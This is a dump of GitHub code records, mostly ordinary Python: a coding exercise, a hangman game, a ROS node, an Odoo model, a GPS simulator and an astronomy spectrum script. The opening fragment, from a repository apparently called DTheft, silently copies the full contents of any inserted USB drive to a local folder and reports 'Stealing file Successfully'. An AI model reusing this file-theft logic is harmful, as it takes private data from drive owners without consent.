f.endswith(\"log.txt\")]:\n log = os.path.join(dirpath, filenames)\n comp = filecmp.cmp(log, tmp_file) \n list_comp.append(comp)\n \n\n \n print(list_comp)\n if True in list_comp :\n os.system(\"cls\")\n print(\"file found : \")\n print(\" \")\n for content in os.listdir(lecteur):\n print(content)\n sleep(1.0)\n \n\n else :\n os.system(\"cls\")\n print(\"Folder name is: \",dt_string)\n print(\" \")\n add_folder = \"md \"+newfolder\n os.system(add_folder)\n\n shutil.copyfile(tmp_file, make_abs)\n print(\"Stealing file Successfully ...\")\n print(\" \")\n dthief_files = \"xcopy \"+lecteur+\"\\*.* /Q /E /Y \"+files+\"*.*\"\n os.system(dthief_files)\n for content in os.listdir(lecteur):\n print(content)\n sleep(2.0)\n \n \n else :\n print(\"USB (not found) \")\n sleep(1.5)\n\n\n\n\n\n \n","repo_name":"anrsaad/DTheft-V1.0","sub_path":"dthief(code for developer).pyw","file_name":"dthief(code for developer).pyw","file_ext":"pyw","file_size_in_byte":2862,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"36587410096","text":"# 최댓값\r\n\r\n# 첫째 줄부터 아홉 번째 줄까지 한 줄에 하나의 자연수가 주어진다. 주어지는 자연수는 100 보다 작다.\r\n# 첫째 줄에 최댓값을 출력하고, 둘째 줄에 최댓값이 몇 번째 수인지를 출력한다.\r\n\r\na = []\r\nfor i in range(9): # 자연수 9개를 입력 받는다.\r\n n = int(input())\r\n a.append(n) # append() -> 리스트의 맨마지막에 n을 추가한다.\r\n\r\nprint(max(a)) # 최댓값 출력\r\nprint(a.index(max(a)) + 1) # 입력한 자연수 중에 최댓값이 몇번째 수인지 출력한다. (index() -> 해당 값의 offset 반환)\r\n# 배열은 0부터 시작하기 때문에 1을 더하여 출력해준다. ex) a[7] -> 8번째\r\n","repo_name":"Choi-yk/baekjoon_lv","sub_path":"2562.py","file_name":"2562.py","file_ext":"py","file_size_in_byte":711,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"27895347749","text":"import requests\nimport json\nimport csv\n\n\n\nblitz_leaderboard_response = requests.get(\"https://ch.tetr.io/api/streams/blitz_global\")\nbase = blitz_leaderboard_response.json()\n\nthing = []\n\nfor i in range(100):\n\n placement = i+1\n username = base[\"data\"][\"records\"][i][\"user\"][\"username\"]\n score = base[\"data\"][\"records\"][i][\"endcontext\"][\"score\"]\n\n method = \"idk\"\n\n clears = base[\"data\"][\"records\"][i][\"endcontext\"][\"clears\"]\n pc_count = clears[\"allclear\"]\n if (pc_count > 10):\n # PC loop, DPC loop, BT loop\n tsd_to_pc = clears[\"tspindoubles\"] / pc_count\n tst_to_pc = clears[\"tspintriples\"] / pc_count\n\n if (tsd_to_pc < .1):\n method = \"PC Loop?\"\n else:\n if (tsd_to_pc < .5):\n method = \"DPC Loop?\"\n else:\n if (tst_to_pc > .5):\n method = \"BT Loop?\"\n else:\n if (base[\"data\"][\"records\"][i][\"endcontext\"][\"topbtb\"] > 30):\n method = \"LST/ST/freestyle?\"\n\n thing.append([placement, username, score, method])\n \nwith open('blitz_thing.csv', 'w', newline='') as file:\n writer = csv.writer(file)\n writer.writerows(thing)\n\n\n\n\n","repo_name":"swng/tetris-scripts","sub_path":"tetrio/guess_blitz_method.py","file_name":"guess_blitz_method.py","file_ext":"py","file_size_in_byte":1179,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"36829867869","text":"import fnmatch\n\nfrom hangman_helper import *\n\n\ndef update_word_pattern(word, pattern, letter):\n \"\"\"\n Takes as parameters the word, the current pattern, and a letter and returns an updated pattern containing the given\n letter.\n :param word: entire word\n :param pattern: current pattern\n :param letter: letter that was guessed\n :return: updated pattern in string format\n \"\"\"\n pattern_list = list(pattern)\n word_list = list(word)\n new_pattern = \"\"\n for i in range(len(word)):\n if word_list[i] == letter:\n pattern_list[i] = letter\n return new_pattern.join(pattern_list)\n\n\ndef run_single_game(list_words, score):\n \"\"\"\n The function receives a list of words and a number of points with which the player starts the game and runs one game\n The function returns the number of points the player has at the end of the game.\n :param list_words: list of words\n :param score: current score\n :return: updated score\n \"\"\"\n wrong_guess_lst = []\n word = get_random_word(list_words)\n message = \"Enter your guess\"\n pattern = ''\n guessed_letter_list = []\n for i in word:\n pattern = pattern + \"_\"\n while \"_\" in pattern and score > 0:\n display_state(pattern, wrong_guess_lst, score, message)\n user_input = get_input()\n letter = user_input[1]\n if user_input[0] == LETTER:\n if len(str(letter)) > 1:\n message = \"Incorrect input\"\n guessed_letter_list.append(letter)\n continue\n if not letter.isalpha():\n message = \"Incorrect input\"\n guessed_letter_list.append(letter)\n continue\n if not letter.islower():\n message = \"Incorrect input\"\n guessed_letter_list.append(letter)\n continue\n if letter in guessed_letter_list:\n message = \"Letter already guessed, please guess another letter\"\n guessed_letter_list.append(letter)\n continue\n # if letter.isalpha() and letter.islower():\n score = score - 1\n if letter not in word:\n message = \"Incorrect Guess! Try Again\"\n wrong_guess_lst.append(letter)\n guessed_letter_list.append(letter)\n continue\n if letter in word:\n pattern = update_word_pattern(word, pattern, letter)\n n = word.count(letter)\n points = n * (n + 1) // 2\n score = score + points\n message = \"Guess the next letter\"\n guessed_letter_list.append(letter)\n continue\n if user_input[0] == WORD:\n score = score - 1\n if user_input[1] == word:\n n = pattern.count('_')\n points = n * (n + 1) // 2\n score = score + points\n pattern = word\n continue\n else:\n message = \"Incorrect word! Guess a word or letter again\"\n continue\n if user_input[0] == HINT:\n score = score - 1\n filtered_list = filter_words_list(list_words, pattern, wrong_guess_lst)\n n = len(filtered_list)\n suggestion_list = []\n if n > HINT_LENGTH:\n for i in range(HINT_LENGTH):\n suggestion_list.append(filtered_list[(i * n) // HINT_LENGTH])\n show_suggestions(suggestion_list)\n else:\n show_suggestions(filtered_list)\n if score <= 0:\n message = \"You Lose, the word is: \" + word\n elif \"_\" not in pattern:\n message = \"You Won\"\n display_state(pattern, wrong_guess_lst, score, message)\n return score\n\n\ndef filter_words_list(words, pattern, wrong_guess_list):\n \"\"\"\n The function returns a new list that contains only the words in the list of words that match the pattern and the\n previous guesses.\n :param words: List of words\n :param pattern: pattern of letters guessed\n :param wrong_guess_list: list of all wrong guesses\n :return: a formatted list\n \"\"\"\n final_list = []\n pattern = str(pattern).replace(\"_\", \"?\")\n filtered_words = fnmatch.filter(words, pattern)\n for i in range(len(filtered_words)):\n for j in wrong_guess_list:\n if j in filtered_words[i]:\n filtered_words[i] = 0\n # if k in filtered_words[i][]:\n for k in filtered_words:\n if k != 0:\n final_list.append(k)\n return final_list\n\n\ndef main():\n \"\"\"\n Main Function that triggers the game\n :return: None\n \"\"\"\n list_words = load_words(file='words.txt')\n initial = POINTS_INITIAL\n interested = True\n games_played = 0\n while interested:\n score = run_single_game(list_words, initial)\n games_played += 1\n if score > 0:\n interested = play_again(\"Total games played: \" + str(games_played) + \" And Current Score: \" + str(score) + \" Do you want to play another round?\")\n initial = score\n if score == 0:\n interested = play_again(\"Total games played: \" + str(games_played) + \" And Current Score: \" + str(score) + \" Do you want to play a new game again?\")\n initial = POINTS_INITIAL\n games_played = 0\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Rahulrxa/python-alfy-bootcamp","sub_path":"Week 2/Day 05/alfy_ex4/ex4_tests/hangman.py","file_name":"hangman.py","file_ext":"py","file_size_in_byte":5388,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"33056438168","text":"import sys\nfrom cx_Freeze import setup, Executable\n\nbase = None\n# To hide console on release versions, uncomment this :\nif sys.platform == \"win32\":\n base = \"Win32GUI\"\n\nsetup( name = \"ccs\",\n version = \"1.5\",\n description = \"CS:GO Custom Sounds\",\n options = {\"build_exe\": {\n \"packages\": [\"os\", \"wx\", \"pyglet\", \"google.protobuf\", \"steamfiles\"],\n \"excludes\": [\"tkinter\"],\n \"include_files\": [\"cache\", \"sounds\", \"gamestate_integration_ccs.cfg\", \"icon.ico\", \"config.ini\"],\n \"bin_includes\": [\"avbin64.dll\"],\n \"optimize\": 2,\n \"include_msvcr\": True,\n }},\n executables = [Executable(\"main.py\", base=base, targetName=\"csgo-custom-sounds.exe\")])\n","repo_name":"Meow-ops/csgo-quake-sounds","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":738,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"73612848242","text":"from __future__ import annotations\nimport os\nfrom typing import Optional\n\nimport resources\nimport shutil\nfrom . import with_parent\nfrom .resource import Resource\n\n\nclass Directory(Resource):\n def __init__(\n self,\n name: str,\n parent: Optional[Directory] = None,\n is_root: bool = False,\n has_files: bool = True,\n **kwargs,\n ):\n super().__init__(\n name=name,\n parent=parent,\n **kwargs,\n )\n self.children: list[Resource] = []\n self.is_root = is_root\n self.has_files = has_files\n\n def __enter__(self):\n with_parent.append(self)\n return self\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n with_parent.pop()\n\n def __iter__(self):\n yield self\n for child in self.children:\n yield from child\n\n def dir_parts(self) -> list[str]:\n return (\n (self.parent.dir_parts() if self.parent else [])\n + ([] if self.is_root else [self.name])\n )\n\n def file_parts(self) -> list[str]:\n return []\n\n @property\n def path(self) -> str:\n return './' if self.is_root else './' + self.dirname\n\n @property\n def url(self) -> str:\n dir_parts = self.dir_parts()\n return ('/' + '/'.join(dir_parts) + '/') if dir_parts else '/'\n\n @property\n def all(self) -> list:\n all = [self]\n for child in sorted(self.children):\n if hasattr(child, 'all'):\n all += child.all\n else:\n all.append(child)\n return all\n\n def find_all_links(self) -> list[(Resource, str)]:\n from .page import Page\n\n links = []\n for resource in self:\n if isinstance(resource, Page):\n page: Page = resource\n links += page.find_links()\n return links\n\n def find_files(self, source_dir: str):\n path = os.path.join(os.getcwd(), source_dir)\n path = os.path.join(path, self.dirname)\n path = os.path.normpath(path)\n if self.has_files:\n with os.scandir(path) as dir:\n for entry in dir:\n if entry.is_file():\n if self.should_include_file(entry.name):\n source = os.path.join(path, entry.name)\n source = os.path.normpath(source)\n source = os.path.relpath(source)\n if source.endswith(resources.page_file.PageFile.EXT):\n resources.page_file.PageFile(source, self)\n else:\n resources.file.File(source, self)\n for child in self.children:\n if hasattr(child, 'find_files'):\n child.find_files(source_dir)\n\n def find_index_page(self) -> Optional[resources.page.Page]:\n for child in self.children:\n if isinstance(child, resources.page.Page) and child.name == 'index':\n return child\n return None\n\n def should_include_file(self, name: str) -> bool:\n return not name.startswith('.')\n\n def build_documents(self):\n for child in self.children:\n child.build_documents()\n\n def generate(\n self,\n output_dir: str,\n is_dry_run=True,\n overwrite=False,\n ):\n path = os.path.join(output_dir, self.path)\n path = os.path.normpath(path)\n if os.path.exists(path) and overwrite:\n print(f'removing existing directory {path}')\n if not is_dry_run:\n shutil.rmtree(path)\n if not os.path.exists(path):\n print(f'creating directory {path}')\n if not is_dry_run:\n os.makedirs(path, exist_ok=overwrite)\n for child in self.children:\n child.generate(output_dir, is_dry_run, overwrite)\n","repo_name":"donmccaughey/donm_cc","sub_path":"gen/resources/directory.py","file_name":"directory.py","file_ext":"py","file_size_in_byte":3963,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"73757736241","text":"import rospy\nimport sys\nimport message_filters\nimport cv2\nimport signal\nimport std_msgs.msg\nfrom flightgoggles.msg import IRMarkerArray, IRMarker\nfrom sensor_msgs.msg import Image\nfrom cv_bridge import CvBridge, CvBridgeError\n\nclass Pixel:\n def __init__(self, x=-1, y=-1):\n \"\"\" Create two points that make up a pixel \"\"\"\n self.x = x\n self.y = y\n\nclass Gate:\n def __init__(self, a=Pixel(), b=Pixel(), c=Pixel(), d=Pixel()):\n \"\"\" Create four pixels that make up a gate \"\"\"\n self.a = a\n self.b = b\n self.c = c\n self.d = d\n\npubl = rospy.Publisher('colored_gates_left', Image, queue_size=100)\npubr = rospy.Publisher('colored_gates_right', Image, queue_size=100)\ngate_names = rospy.get_param(\"/uav/gate_names\", '[]')\n\ndef callback(ir_data, image_data_l, image_data_r):\n # process image data\n bridge = CvBridge()\n try:\n cv_image_l = bridge.imgmsg_to_cv2(image_data_l, \"bgr8\")\n cv_image_r = bridge.imgmsg_to_cv2(image_data_r, \"bgr8\")\n except CvBridgeError as e:\n print(e)\n\n relevant_gate_dict = {}\n\n for gates in gate_names:\n relevant_gate_dict[gates] = Gate()\n\n #print(\"gate_vals {}\".format(gates))\n for marker in ir_data.markers:\n if(marker.landmarkID.data in relevant_gate_dict):\n gate = relevant_gate_dict.get(marker.landmarkID.data)\n if(marker.markerID.data == \"1\"):\n gate.a = Pixel(marker.x, marker.y)\n elif(marker.markerID.data == \"2\"):\n gate.b = Pixel(marker.x, marker.y)\n elif(marker.markerID.data == \"3\"):\n gate.c = Pixel(marker.x, marker.y)\n elif(marker.markerID.data == \"4\"):\n gate.d = Pixel(marker.x, marker.y)\n relevant_gate_dict[marker.landmarkID.data] = gate\n # print(\"gate {}\".format(marker.landmarkID.data))\n # print(\"ID {}\".format(marker.markerID.data))\n # print(\"x {}, y {}\".format(marker.x, marker.y))\n # print(\"\\n\")\n for marker_ in relevant_gate_dict:\n gate_ = relevant_gate_dict[marker_]\n #print(\"rectangle t-l x {}, y {} : b-r x {}, y {}\".format(int(gate_.a.x), int(gate_.a.y),\\\n #int(gate_.d.x), int(gate_.d.y)))\n #cv2.rectangle(cv_image, (int(gate_.a.x), int(gate_.a.y)), (int(gate_.d.x), int(gate_.d.y)), (255,0,255), 2)\n if gate_.a.x != -1:\n cv2.circle(cv_image_l, (int(round(gate_.a.x)), int(round(gate_.a.y))), 5, (255,0,255), -1)\n if gate_.b.x != -1:\n cv2.circle(cv_image_l, (int(round(gate_.b.x)), int(round(gate_.b.y))), 5, (255,0,255), -1)\n if gate_.c.x != -1:\n cv2.circle(cv_image_l, (int(round(gate_.c.x)), int(round(gate_.c.y))), 5, (255,0,255), -1)\n if gate_.d.x != -1:\n cv2.circle(cv_image_l, (int(round(gate_.d.x)), int(round(gate_.d.y))), 5, (255,0,255), -1)\n\n if gate_.a.x != -1:\n cv2.circle(cv_image_r, (int(round(gate_.a.x)), int(round(gate_.a.y))), 5, (255,0,255), -1)\n if gate_.b.x != -1:\n cv2.circle(cv_image_r, (int(round(gate_.b.x)), int(round(gate_.b.y))), 5, (255,0,255), -1)\n if gate_.c.x != -1:\n cv2.circle(cv_image_r, (int(round(gate_.c.x)), int(round(gate_.c.y))), 5, (255,0,255), -1)\n if gate_.d.x != -1:\n cv2.circle(cv_image_r, (int(round(gate_.d.x)), int(round(gate_.d.y))), 5, (255,0,255), -1)\n\n left = bridge.cv2_to_imgmsg(cv_image_l, \"bgr8\")\n right = bridge.cv2_to_imgmsg(cv_image_r, \"bgr8\")\n hl = std_msgs.msg.Header()\n hr = std_msgs.msg.Header()\n hl.stamp = image_data_l.header.stamp\n hr.stamp = image_data_r.header.stamp\n left.header = hl\n right.header = hr\n publ.publish(left)\n pubr.publish(right)\n\n # print(\"published\")\n #cv2.imshow(\"window\", cv_image)\n #cv2.waitKey(100)\n\ndef signal_handler(sig, frame):\n print('\\n Bye bye!')\n sys.exit(0)\n\ndef main():\n signal.signal(signal.SIGINT, signal_handler)\n rospy.init_node('republish_colored_gates_node')\n\n ir_sub = message_filters.Subscriber('/uav/camera/left/ir_beacons', IRMarkerArray)\n image_sub_l = message_filters.Subscriber('/uav/camera/left/image_rect_color', Image)\n image_sub_r = message_filters.Subscriber('/uav/camera/right/image_rect_color', Image)\n\n ts = message_filters.ApproximateTimeSynchronizer([ir_sub, image_sub_l, image_sub_r], 10, 0.3)\n ts.registerCallback(callback)\n\n rospy.spin()\n\nmain()\n","repo_name":"DevMMI/FlightGoggles_Training","sub_path":"republish_colored_gates.py","file_name":"republish_colored_gates.py","file_ext":"py","file_size_in_byte":4443,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"75"} +{"seq_id":"35347328245","text":"import pika\nimport json\nimport os\nimport django\n\nos.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"admin.settings\")\ndjango.setup()\n\n# INSTALLED_APPSを有効にしてからimport\nfrom products.models import Product # noqa: E402\n\nparams = pika.ConnectionParameters(\"rabbitmq\")\nconnection = pika.BlockingConnection(params)\nchannel = connection.channel()\n\nchannel.queue_declare(queue=\"admin\")\n\n\ndef callback(ch, method, properties, body):\n print(\"Received in admin\")\n id = json.loads(body)\n print(id)\n product = Product.objects.get(id=id)\n product.likes = product.likes + 1\n product.save()\n print(\"Product likes increased!\")\n\n\nchannel.basic_consume(queue=\"admin\", on_message_callback=callback, auto_ack=True)\n\nprint(\"Started Consuming\")\n\nchannel.start_consuming()\n\nchannel.close()\n","repo_name":"ke6ch/python-microservice-camp","sub_path":"admin/consumer.py","file_name":"consumer.py","file_ext":"py","file_size_in_byte":799,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"17300058994","text":"import datetime\nfrom datetime import date\n\nfrom odoo import fields, models, api, _\n\n\nclass EducationDocuments(models.Model):\n _name = 'education.documents'\n _description = \"Student Documents\"\n _inherit = ['mail.thread']\n\n @api.model\n def create(self, vals):\n \"\"\"Over riding the create method to assign\n the sequence for newly creating records\"\"\"\n if vals.get('name', _('New')) == _('New'):\n vals['name'] = self.env['ir.sequence'].next_by_code(\n 'education.documents') or _('New')\n res = super(EducationDocuments, self).create(vals)\n return res\n\n def verify_document(self):\n \"\"\"Return the state to done if the documents are perfect\"\"\"\n for rec in self:\n rec.write({\n 'verified_by': self.env.uid,\n 'verified_date': datetime.datetime.now().strftime(\"%Y-%m-%d\"),\n 'state': 'done'\n })\n\n def need_correction(self):\n \"\"\"Return the state to correction if the documents are not perfect\"\"\"\n for rec in self:\n rec.write({\n 'state': 'correction'\n })\n\n def hard_copy_returned(self):\n \"\"\"Records who return the documents and when is it returned\"\"\"\n for rec in self:\n if rec.state == 'done':\n rec.write({\n 'state': 'returned',\n 'returned_by': self.env.uid,\n 'returned_date': datetime.datetime.now().strftime(\n \"%Y-%m-%d\")\n })\n\n name = fields.Char(string='Serial Number', copy=False,\n default=lambda self: _('New'))\n document_name = fields.Many2one('document.document', string='Document Type',\n required=True,\n help=\"Choose the type of the Document\")\n description = fields.Text(string='Description', copy=False,\n help=\"Enter a description about the document\")\n has_hard_copy = fields.Boolean(\n string=\"Hard copy Received\",\n help=\"Tick the field if the hard copy is provided\")\n location_id = fields.Many2one(\n 'stock.location', 'Location',\n domain=\"[('usage', '=', 'internal')]\",\n help=\"Location where which the hard copy is stored\")\n location_note = fields.Char(string=\"Location Note\",\n help=\"Enter some notes about the location\")\n submitted_date = fields.Date(string=\"Submitted Date\", default=date.today(),\n help=\"Documents are submitted on\")\n received_by = fields.Many2one('hr.employee', string=\"Received By\",\n help=\"The Documents are received by\")\n returned_by = fields.Many2one('hr.employee', string=\"Returned By\",\n help=\"The Documents are returned by\")\n verified_date = fields.Date(string=\"Verified Date\",\n help=\"Date at the verification is done\")\n returned_date = fields.Date(string=\"Returned Date\", help=\"Returning date\")\n reference = fields.Char(string='Document Number', required=True, copy=False)\n responsible_verified = fields.Many2one('hr.employee', string=\"Responsible\")\n responsible_returned = fields.Many2one('hr.employee', string=\"Responsible\")\n\n verified_by = fields.Many2one('res.users', string='Verified by')\n application_ref = fields.Many2one('education.application', invisible=1,\n copy=False)\n doc_attachment_id = fields.Many2many(\n 'ir.attachment', 'education_doc_attach_rel',\n 'doc_id', 'attach_id3',\n string=\"Attachment\",\n help='You can attach the copy of your document',\n copy=False)\n state = fields.Selection(\n [('draft', 'Draft'), ('correction', 'Correction'), ('done', 'Done'),\n ('returned', 'Returned')],\n string='State', required=True, default='draft',\n track_visibility='onchange')\n\n\nclass HrEmployeeAttachment(models.Model):\n _inherit = 'ir.attachment'\n\n doc_attach_rel = fields.Many2many('education.documents',\n 'doc_attachment_id', 'attach_id3',\n 'doc_id',\n string=\"Attachment\", invisible=1)\n\n\nclass DocumentDocument(models.Model):\n _name = 'document.document'\n _description = \"Documents Type\"\n\n name = fields.Char(string='Name', required=True)\n description = fields.Char(string='Description')\n","repo_name":"CybroOdoo/EducationalERP","sub_path":"education_core/models/education_documents.py","file_name":"education_documents.py","file_ext":"py","file_size_in_byte":4564,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"75"} +{"seq_id":"10662844600","text":"import random\nimport csv\ndef GetRandomSyn(file_name):\n random_line = GetRandomLine(file_name)\n random_line = random_line.upper() \n lst_line = random_line.split(\",\")\n chosen = lst_line[0]\n lst_syns=[]\n for i in range(1,len(lst_line),2):\n s = [lst_line[i],int(lst_line[i+1])]\n lst_syns.append(s)\n return chosen,lst_syns \n \ndef ReadCSV(filename):\n with open(filename, mode ='r')as file:\n csvFile = list(csv.reader(file))\n return csvFile \n \ndef GetRandomLine(file_name):\n with open(file_name,\"r\") as f:\n L1=f.read().splitlines()\n print(len(L1)) \n return random.choice(L1)\ndef GetAllWords(file_name):\n with open(file_name,\"r\") as f:\n L1=f.read().splitlines()\n return L1 \ndef GetRandomColor():\n \n color = random.randrange(0, 2**24)\n hex_color = hex(color)\n std_color = \"#\" + hex_color[2:]\n return std_color\n ","repo_name":"vihutuo/synonyms","sub_path":"mymodules/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":882,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"38417592103","text":"import random\nimport time\nimport csv\nimport os\nfrom datetime import datetime\n\ndef collect_gps_data():\n lat = random.uniform(22.5, 22.6)\n lon = random.uniform(114.1, 114.2)\n speed = random.uniform(20, 60)\n gps_values = f\"Latitude:{lat} Longitude:{lon} Speed:{speed}\"\n return gps_values\n\ndef create_directory_if_not_exists(directory):\n if not os.path.exists(directory):\n try:\n os.makedirs(directory)\n except FileExistsError:\n pass # Directory already exists, ignore the error\n\ndef save_gps_data(directory, timestamp, gps, data_unit):\n file_name = \"gps.csv\"\n file_path = os.path.join(directory, file_name)\n with open(file_path, 'a', newline='') as csvfile:\n writer = csv.writer(csvfile)\n if os.stat(file_path).st_size == 0:\n writer.writerow([\"Timestamp\", f\"GPS Values({data_unit})\"])\n writer.writerow([timestamp, gps])\n\n# Set the duration for the script to run (24 hours)\nduration = 24 * 60 * 60 # 24 hours in seconds\nstart_time = time.time()\ngps_unit = \"km/h\"\n\nwhile True:\n # Check if 24 hours have passed\n if time.time() - start_time > duration:\n break\n\n # Get the current timestamp\n current_timestamp = datetime.now()\n\n # Create directories for each day and hour\n day_directory = current_timestamp.strftime(\"%Y-%m-%d\")\n hour_directory = current_timestamp.strftime(\"%H\")\n directory_to_write = os.path.join(\"data\", day_directory, hour_directory)\n create_directory_if_not_exists(\"data\")\n create_directory_if_not_exists(os.path.join(\"data\", day_directory))\n create_directory_if_not_exists(directory_to_write)\n\n # GPS values reading\n gps_values = collect_gps_data()\n\n # Save the GPS values reading with timestamp to the CSV file\n save_gps_data(directory_to_write, current_timestamp, gps_values, gps_unit)\n\n # Print the simulated GPS values reading with timestamp (optional)\n print(f\"{current_timestamp} - GPS Values: {gps_values} {gps_unit}\")\n\n # Wait for 5 seconds before generating the next reading\n time.sleep(5)\n\n# Print a message indicating the end of the script\nprint(\"Script completed after 24 hours.\")\n\n","repo_name":"linweilonger/sc-group-projet3","sub_path":"gps.py","file_name":"gps.py","file_ext":"py","file_size_in_byte":2167,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"7949250613","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nimport os\nimport numpy as np\nfrom astropy.io import fits\nimport h5py\n\nfrom astropy.table import Table\nfrom collections import OrderedDict\nimport argparse\n\nfrom pandeia_utils import bn, majorminor, sn_user_spec\n\nc_light = 2.99792e18 # Ang/s\n\n#This script was adapted from a short script written by Michael Maseda\n#demonstrating how to set up emission line S/N calculations in pandeia.\n\nexposureDict = {'DEEP':{'clear':{'ngroup':19,'nint':2,'nexp':36}}\n #'MEDIUM':{'clear':{'ngroup':13,'nint':1,'nexp':9}},\n }\n#exposureDict = {'DEEP':{'clear':{'ngroup':19,'nint':2,'nexp':36},'f070lp':{'ngroup':19,'nint':2,'nexp':9},'f100lp':{'ngroup':19,'nint':2,'nexp':9},'f170lp':{'ngroup':19,'nint':2,'nexp':9},'f290lp':{'ngroup':19,'nint':2,'nexp':9}},\\\n# 'MEDIUM':{'clear':{'ngroup':13,'nint':1,'nexp':9},'f070lp':{'ngroup':13,'nint':1,'nexp':9},'f100lp':{'ngroup':13,'nint':1,'nexp':9},'f170lp':{'ngroup':13,'nint':1,'nexp':9},'f290lp':{'ngroup':13,'nint':1,'nexp':9}},\\\n# 'MEDIUM_HST':{'clear':{'ngroup':16,'nint':1,'nexp':6},'f070lp':{'ngroup':13,'nint':1,'nexp':6},'f100lp':{'ngroup':13,'nint':1,'nexp':6},'f170lp':{'ngroup':13,'nint':1,'nexp':6},'f290lp':{'ngroup':16,'nint':1,'nexp':6}},\\\n# 'DEEP_WORST_CASE':{'clear':{'ngroup':19,'nint':2,'nexp':12}},\\\n# 'MEDIUM_WORST_CASE':{'clear':{'ngroup':13,'nint':1,'nexp':3}},\\\n# 'MEDIUM_HST_WORST_CASE':{'clear':{'ngroup':16,'nint':1,'nexp':6}}}\n#exposureDict = {'DEEP':{'clear':{'ngroup':19,'nint':2,'nexp':36}},\\\n# 'MEDIUM':{'clear':{'ngroup':13,'nint':1,'nexp':9}},\\\n# 'MEDIUM_HST':{'clear':{'ngroup':16,'nint':1,'nexp':6}},\\\n# 'DEEP_WORST_CASE':{'clear':{'ngroup':19,'nint':2,'nexp':12}},\\\n# 'MEDIUM_WORST_CASE':{'clear':{'ngroup':13,'nint':1,'nexp':3}},\\\n# 'MEDIUM_HST_WORST_CASE':{'clear':{'ngroup':16,'nint':1,'nexp':2}}}\n\nGratings = ['g140m', 'g140m', 'g235m', 'g395m']\nFilters = ['f070lp', 'f100lp', 'f170lp', 'f290lp']\nfilterDict = {'clear': 'prism',\n 'f070lp': 'g140m',\n 'f100lp': 'g140m',\n 'f170lp': 'g235m',\n 'f290lp': 'g395m'}\n\n\ndef get_beagle_input(iobj, args):\n \"\"\"Given a set of arguments and an object index, return the input spectrum\n\n Returns\n --------\n\n z : float\n The redshift\n\n wave : ndarray\n The observed frame wavelength, in micron\n\n spec : ndarray, same shape as wave\n The observed frame fluxes in mJy\n\n sizes : A structured array\n \"\"\"\n cat = fits.open(args.spectrum_file)\n sizes, sizes_supplied = None, False\n if args.sizes_file is not None:\n sizes = fits.open(args.sizes_file)[1].data\n sizes_supplied = True\n\n wl = cat['FULL SED WL'].data[0][0]\n spec = cat['FULL SED'].data[iobj, :]\n z = cat['GALAXY PROPERTIES'].data['redshift'][iobj]\n\n tempWl = wl * (1 + z)\n tempSpec = spec / (1 + z)\n # convert from erg/s/cm^2/AA to mJy\n tempSpec *= tempWl**2 / c_light * 1e23 * 1e3\n tempWl /= 1e4 # AA to micron\n deduped = {w: s for w, s in reversed(zip(list(tempWl), list(tempSpec)))}\n tempWl = np.asarray(sorted(deduped.keys()))\n tempSpec = np.asarray([deduped[k] for k in tempWl])\n\n return z, tempWl, tempSpec, sizes\n\n\ndef get_pro_input(iobj, args):\n \"\"\"Given a set of arguments and an object index, return the input spectrum\n\n Returns\n --------\n\n z : float\n The redshift\n\n wave : ndarray\n The observed frame wavelength, in micron\n\n spec : ndarray, same shape as wave\n The observed frame fluxes in mJy\n\n sizes : A structured array\n \"\"\"\n sizes = None\n\n with h5py.File(args.spectrum_file, \"r\") as f:\n cat = f[str(iobj)][\"prospector_intrinsic\"]\n wl = cat[\"wavelength\"][:]\n spec = cat[\"spectrum\"][:]\n z = cat.attrs[\"object_redshift\"]\n if args.use_sizes:\n sizes = f[str(iobj)][\"jaguar_parameters\"][()]\n\n # convert from maggies to mJy\n #assert cat.attrs[\"flux_units\"] == \"maggies\"\n tempSpec = spec * 3631 * 1e3\n # AA to micron\n #assert cat.attrs[\"wave_units\"] == \"angstroms\"\n tempWl = wl / 1e4\n\n return z, tempWl, tempSpec, sizes\n\n\ndef build_input(iobj, args):\n\n # get redshifted intrinsic spectrum\n #try:\n # z, tempWl, tempSpec, sizes = get_beagle_input(iobj, args)\n #except:\n z, tempWl, tempSpec, sizes = get_pro_input(iobj, args)\n\n inputs = {\"wl\": tempWl, \"spec\": tempSpec,\n \"xoff\": 0, \"yoff\": 0,\n \"axis_ratio\": 1, \"sersic_n\": -99,\n \"position_angle\": 0, \"re_circ\": -99,\n \"onSource\": [False, True, False],\n \"slitletShape\": [[0, -1], [0, 0], [0, 1]],\n \"ID\": iobj}\n if sizes is not None:\n inputs['axis_ratio'] = sizes['axis_ratio']\n inputs['sersic_n'] = sizes['sersic_n']\n inputs['position_angle'] = sizes['position_angle']\n inputs['re_circ'] = (sizes['Re_maj'] *\n np.sqrt(sizes['axis_ratio'])\n )\n inputs['re_maj'] = sizes['Re_maj']\n #if 'ID' in sizes.dtype.names:\n # inputs[\"ID\"] = sizes[\"ID\"]\n\n return inputs, z\n\n\nif __name__ == \"__main__\":\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--spectrum_file\", type=str, default=\"\")\n parser.add_argument(\"--use_sizes\", action=\"store_true\")\n parser.add_argument(\"--write_fits_spectrum\", action=\"store_true\")\n parser.add_argument(\"--nobj\", type=int, default=-99)\n parser.add_argument(\"--output_folder\", default=\".\")\n args = parser.parse_args()\n\n assert 